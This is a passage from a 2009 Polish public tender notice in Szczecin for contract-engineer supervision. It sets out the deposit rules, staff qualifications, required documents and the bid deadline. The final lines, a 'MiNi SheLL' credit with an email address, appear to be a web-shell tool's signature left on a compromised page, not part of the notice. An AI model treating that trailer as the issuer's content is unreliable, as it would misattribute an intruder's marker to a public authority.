<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.26.40.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.    Wadium należy wnieść w wysokości 5.000,00 zł (słownie: pięć tysięcy złotych i 00/100).
2.   Wykonawca wnosi wadium w terminie do dnia 19.10.2009 r., do godziny 10.00. Decyduje data wpływu środków do Zamawiającego.
3.   Wadium może być wnoszone:
1)	w pieniądzu - przelewem na konto Zamawiającego - PeKaO S.A. I Oddział/Szczecin 22124038131111000043932038.
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2)  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości -w kasie wewnętrznej Zamawiającego, od poniedziałku do piątku w godz. 7.00 - 15.00.
3)	Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz zamawiającego w przypadku gdy:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
4.	W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
1)	zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji) zawierające oświadczenie, że zaistniały okoliczności, o których mowa w pkt 3  bez potwierdzania tych okoliczności, 
2)	termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą,
3)	miejsce i termin zwrotu gwarancji.
5.	Wadium może być wniesione w jednej lub kilku formach.
6.	Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą wadium zostanie przez zamawiającego wykluczony a oferta uznana za odrzuconą.
7.	W ofercie należy wpisać nr konta, na który zamawiający będzie mógł zwrócić wadium lub do oferty załączyć upoważnienie dla osoby, której zamawiający będzie mógł zwrócić wadium.
8.	Wadium wniesione w pieniądzu zamawiający przechowa na rachunku bankowym.
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w rozdziale V pkt 4 SIWZ, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw. Zamawiający zwróci wadium, jeśli wykonawca udowodni, że nastąpiło to z przyczyn nie leżących po jego stronie.
10.	Dyspozycję w zakresie wypłaty wadium wpłaconego w formie pieniężnej, dla wykonawców, których oferty nie zostaną wybrane, zamawiający przekaże do właściwego oddziału banku wykonawcy niezwłocznie po podpisaniu umowy i wniesieniu zabezpieczenia należytego wykonania umowy przez wykonawcę, którego oferta została wybrana, lecz nie później niż następnego dnia po zakończeniu związania ofertą.
11.	Dyspozycję w zakresie wypłaty wadium wpłaconego w formie pieniężnej, dla wykonawcy, którego oferta zostanie wybrana, zamawiający przekaże do właściwego oddziału banku wykonawcy niezwłocznie po podpisaniu umowy i wniesieniu zabezpieczenia należytego wykonania umowy.
12.	Na wniosek wykonawcy, którego oferta zostanie uznana za najkorzystniejszą zamawiający zaliczy wadium wpłacone w pieniądzu na poczet zabezpieczenia należytego wykonania umowy.
13.	Zamawiający zwróci wadium niezwłocznie po zgłoszeniu pisemnego wniosku przez wykonawcę:
1)	który wycofał ofertę przed upływem terminu składania ofert,
2)	który został wykluczony z postępowania,
3)	którego oferta została odrzucona. 
14.	Jeżeli wadium zostanie wniesione w pieniądzu zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
15.	Zamawiający niezwłocznie zwróci wadium w przypadku unieważnienia postępowania, po ostatecznym rozstrzygnięciu ewentualnych protestów lub upływie terminu do ich składania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.   O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonaniezamówienia,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5)	spełniają następujące warunki dodatkowe:
a)	dysponują osobami zdolnymi do wykonania zamówienia. 
Zamawiający uzna, że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia jeżeli wykaże iż dysponuje co najmniej po jednej osobie na każde wymienione poniżej stanowisko (chyba, że osoby te posiadają łącznie kwalifikacje i doświadczenie zawodowe na więcej niż jedno stanowisko):
1.	Inżynier Kontraktu lub upoważniony przedstawiciel Wykonawcy niniejszego zamówienia.
	Wymagane kwalifikacje:
Uprawnienia budowlane w  specjalności konstrukcyjno - budowlanej bez ograniczeń, do projektowania obiektu budowlanego lub kierowania robotami budowlanymi związanymi z obiektem budowlanym.
Przynależność do właściwej izby samorządu zawodowego.
Wymagane doświadczenie zawodowe:
Nie mniej niż 8-letnie doświadczenie zawodowe w branży budowlanej. Doświadczenie na stanowiskach: Inżynier Kontraktu lub Inżynier Rezydent na co najmniej jednej inwestycji komunikacyjnej realizowanej na terenie Polski.
2	Inspektor nadzoru robót drogowych.
	Wymagane kwalifikacje:
Uprawnienia budowlane w specjalności drogowej bez ograniczeń lub konstrukcyjno - budowlanej bez ograniczeń do kierowania robotami budowlanymi związanymi z obiektem budowlanym, przynależność do właściwej izby samorządu zawodowego.
Wymagane doświadczenie zawodowe:
Nie mniej niż 3-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót budowlanych. 
3.	Inspektor nadzoru robót sanitarnych.
	Wymagane kwalifikacje:
Uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń do kierowania robotami budowlanymi związanymi z obiektem budowlanym, przynależność do właściwej izby samorządu zawodowego.
Wymagane doświadczenie zawodowe:
Nie mniej niż 3-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót budowlanych. 
4.	Inspektor nadzoru robót elektrycznych i elektroenergetycznych.
	Wymagane kwalifikacje:
Uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń do kierowania robotami budowlanymi związanymi z obiektem budowlanym, przynależność do właściwej izby samorządu zawodowego.
Wymagane doświadczenie zawodowe:
Nie mniej niż 3-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót budowlanych. 
5.           Inspektor nadzoru robót zieleniarskich
              Wymagane kwalifikacje:
Wykształcenie wyższe rolnicze/ogrodnicze, min. 3-letnie doświadczenie zawodowe w kierowaniu pracami przy zakładaniu terenów zieleni /parki, zieleńce, skwery, itp./

UWAGA: Zamawiający dopuszcza łączenie wyżej opisanych stanowisk, jeżeli którakolwiek z przewidzianych osób posiada łącznie wymagane przez zamawiającego kwalifikacje i doświadczenie zawodowe.
b)	wykonali należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie - minimum jedną pracę podobną do prac objętych przedmiotem zamówienia.
Za prace podobną Zamawiający uzna pełnienie funkcji Inżyniera Kontraktu, Inżyniera Rezydenta lub Nadzoru Inwestorskiego na inwestycji związanej z:
A.     budową cmentarza, o wartości inwestycji nie mniejszej niż 8 000 000,00 zł brutto,
albo
B.     budową innego obiektu z branży konstrukcyjno - budowlanej lub drogowej, obejmującą również infrastrukturę techniczna, tj. m.in. sieć wod. - kan., odwodnienie, sieć elektro-energetyczną, oraz zagospodarowanie terenu i małą architekturę, o wartości inwestycji nie mniejszej niż 8 00 000,00 zł brutto.  
Zamawiający uwzględni tylko zadania zakończone.

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Każdy z wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty potwierdzające 	spełnienie warunków udziału w postępowaniu:
1)	Oświadczenie wykonawcy, według wzoru stanowiącego załącznik nr 2 do siwz o spełnianiu warunków określonych w art. 22 ust. 1 ustawy,
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik 
w imieniu wykonawców składających ofertę wspólną.
2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.
3)	Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności według wzoru, stanowiącego załącznik nr 3 do niniejszej siwz. 
W przypadku składania oferty wspólnej wykonawcy składają jeden wspólny wykaz osób i podmiotów.
4)	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 4 wykonawca wskazał osoby, którymi będzie dysponował;
5)	Dokumenty stwierdzające, że osoby o których mowa w ppkt 3) posiadają wymagane uprawnienia, o których mowa w pkt 1. ppkt 5 a) oraz dokumenty potwierdzające przynależność tych osób do właściwej izby samorządu zawodowego aktualne na dzień składania ofert.
6)	Wykaz wykonanych usług (prac podobnych) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym 	okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia 	z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców według wzoru, stanowiącego załącznik nr 4 do niniejszej siwz oraz dokumenty np. referencje potwierdzające, że usługi te 	zostały wykonane należycie.
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; pok. 17-18
cena: 320,00 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2009 godzina 10:00, miejsce: Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2 siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz).
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2.          Zmiana umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com